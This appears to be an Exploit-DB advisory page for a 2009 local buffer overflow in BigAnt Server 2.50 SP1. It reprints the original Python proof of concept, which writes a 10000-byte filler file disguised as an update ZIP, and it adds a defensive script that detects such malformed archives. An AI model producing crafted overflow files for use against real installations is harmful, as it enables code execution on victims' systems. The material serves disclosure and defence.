Vendor: BigAnt Server
By: Dr_IDE
CVSS: 9.3 (HIGH)
Type: Buffer Overflow
CWE: 120
Product Name: BigAnt Server
Affected Version From: 2.50 SP1
Affected Version To: 2.50 SP1
Patch Exists: YES
Related CWE: N/A
CPE: a:bigantsoft:bigant_server:2.50_sp1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

BigAnt Server 2.50 SP1 Local Buffer Overflow PoC

BigAnt Server 2.50 SP1 is vulnerable to a local buffer overflow. An attacker can exploit it to execute arbitrary code on the vulnerable system. To trigger it, the attacker opens the BigAnt Console, goes to the Update option, and browses to a specially crafted zip file, which causes the buffer overflow and allows arbitrary code execution.

Mitigation:

Upgrade to the latest version of BigAnt Server 2.50 SP1 or apply the patch provided by the vendor.

Exploit-DB raw data:

#!/usr/bin/env python

#######################################################################
#
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:	Open BigAnt Console, Go to Update, Browse to zip, Boom.
#
#######################################################################

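# Filler content: 10000 bytes of 0x41 ("A"); the file is not a valid ZIP archive.
buff = b"\x41" * 10000

# Write the file in binary mode; the with block closes it on exit.
with open("BigAntUpdate.zip", "wb") as f1:
    f1.write(buff)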

# milw0rm.com [2009-09-16]
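
A defensive triage check, added here as an example (not code from the original page, the PoC author, or the vendor): it flags files presented as update archives that lack basic ZIP structure, as the 10000-byte filler file written by the PoC does. The function names, the 0.9 filler threshold and the in-memory sample archive are assumptions constructed for illustration.

```python
import io
import zipfile
from collections import Counter

LOCAL_HEADER = b"PK\x03\x04"   # first record of a non-empty ZIP
EOCD = b"PK\x05\x06"           # End of Central Directory record
EOCD_WINDOW = 22 + 65535       # EOCD size plus maximum comment length


def triage_update_archive(data: bytes, filler_ratio: float = 0.9) -> list:
    """Return a list of findings; an empty list means the ZIP structure looks sane."""
    findings = []
    if not data.startswith((LOCAL_HEADER, EOCD)):
        findings.append("no ZIP signature at offset 0")
    if EOCD not in data[-EOCD_WINDOW:]:
        findings.append("no End of Central Directory record")
    if len(data) >= 256:
        # A file dominated by one byte value is padding, not compressed data.
        byte, count = Counter(data).most_common(1)[0]
        if count / len(data) >= filler_ratio:
            findings.append("%.0f%% of file is byte 0x%02x (filler pattern)"
                            % (100.0 * count / len(data), byte))
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            bad = zf.testzip()          # CRC check of every member
            if bad is not None:
                findings.append("CRC mismatch in member %r" % bad)
    except (zipfile.BadZipFile, RuntimeError):
        findings.append("zipfile cannot parse or read the archive")
    return findings


def make_sample_zip() -> bytes:
    """Constructed sample: a small well-formed archive built in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("update/readme.txt", "constructed sample update\n" * 20)
    return buf.getvalue()


if __name__ == "__main__":
    samples = {
        "well-formed (constructed)": make_sample_zip(),
        "10000 x 0x41, same content as the PoC file": b"\x41" * 10000,
    }
    for name, blob in samples.items():
        print(name, "->", triage_update_archive(blob) or "OK")
```

The offset-0 check is deliberately strict: self-extracting or prefixed archives will also be flagged and need manual review.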